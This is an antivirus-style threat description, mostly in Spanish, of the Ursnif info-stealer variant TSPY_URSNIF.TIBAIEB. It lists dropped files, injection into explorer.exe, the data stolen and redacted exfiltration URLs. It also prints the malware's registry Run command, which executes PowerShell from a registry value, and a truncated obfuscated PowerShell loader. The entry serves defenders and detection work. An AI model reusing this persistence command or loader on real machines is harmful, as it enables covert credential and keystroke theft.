TSPY_URSNIF.TIBAIEB

Se conecta a determinados sitios Web para enviar y recibir información.

Instalación

Infiltra los archivos siguientes:

• %User Temp%\{random string).err - deleted afterwards
• %User Temp%\{random string).dll - deleted afterwards
• %User Temp%\{random string).cmdline - deleted afterwards
• %User Temp%\{random string).pdb - deleted afterwards
• %User Temp%\{random string).tmp - deleted afterwards
• %User Temp%\{random string).out - deleted afterwards
• %User Temp%\{random string).0.cs - deleted afterwards

(Nota: %User Temp% es la carpeta Temp del usuario activo, que en el caso de Windows 2000, XP y Server 2003 suele estar en C:\Documents and Settings\{nombre de usuario}\Local Settings\Temp).

Este malware inyecta códigos en el/los siguiente(s) proceso(s):

• explorer.exe

Técnica de inicio automático

Agrega las siguientes entradas de registro para permitir su ejecución automática cada vez que se inicia el sistema:

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
{string1}{string2} = cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\{GUID}').{string1}{string2}))

Otras modificaciones del sistema

Agrega las siguientes entradas de registro como parte de la rutina de instalación:

HKEY_CURRENT_USER\Software\AppDataLow\
Software\Microsoft\{GUID}

HKEY_CURRENT_USER\Software\AppDataLow\
Software\Microsoft\{GUID}\
Vars

HKEY_CURRENT_USER\Software\AppDataLow\
Software\Microsoft\{GUID}\
Files

HKEY_CURRENT_USER\Software\AppDataLow\
Software\Microsoft\{GUID}\
Run

HKEY_CURRENT_USER\Software\AppDataLow\
Software\Microsoft\{GUID}\
Config

Agrega las siguientes entradas de registro:

HKEY_CURRENT_USER\Software\AppDataLow\
Software\Microsoft\{GUID}
{UID} = "{hex value}"

HKEY_CURRENT_USER\Software\AppDataLow\
Software\Microsoft\{GUID}
{Value Name} = "{hex value}"
where {Value Name} may be any of the following:

• Main
• Block
• Temp
• Client
• Client32
• Ini
• Keys
• Scr
• Kill
• LastTask
• LastConfig
• Exec
• TorClient
• TorCrc

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Internet Settings
EnableSPDY3_0 = "0"

HKEY_CURRENT_USER\Software\AppDataLow\
Software\Microsoft\{GUID}
{string1}{string2} = $ylpvpgxk="kqcx";function aiyffsth{$ihruemuho=[System.Convert]::FromBase64String($args[0]);[System.Text.Encoding]::ASCII.GetString($ihruemuho);}; [byte[]]$hjbbb=@(233,43,226,0,0,0,0,0,4,0,0,0... (truncated)

Rutina de infiltración

Infiltra los archivos siguientes donde guarda la información que recopila:

• %User Temp%\{random filename}.bin
• %User Temp%\{random filename}.bi1

(Nota: %User Temp% es la carpeta Temp del usuario activo, que en el caso de Windows 2000, XP y Server 2003 suele estar en C:\Documents and Settings\{nombre de usuario}\Local Settings\Temp).

Robo de información

Recopila los siguientes datos:

• Computer Name
• Digital Certificates
• Cookies
• Keyboard Logs
• Clipboard Logs
• Captured Screenshot
• Email Credentials
• Running processes and services
• Installed device drivers
• Installed Programs
• System Information (Please see notes for more details)
• List of computer and network resources

Información sustraída

Este malware envía la información recopilada a la siguiente URL a través de HTTP POST:

• https://{BLOCKED}nqweqe.com/images/{random path}.bmp

Otros detalles

Se conecta al sitio Web siguiente para enviar y recibir información:

• http://{BLOCKED}lagood.fun/images/{random path}.avi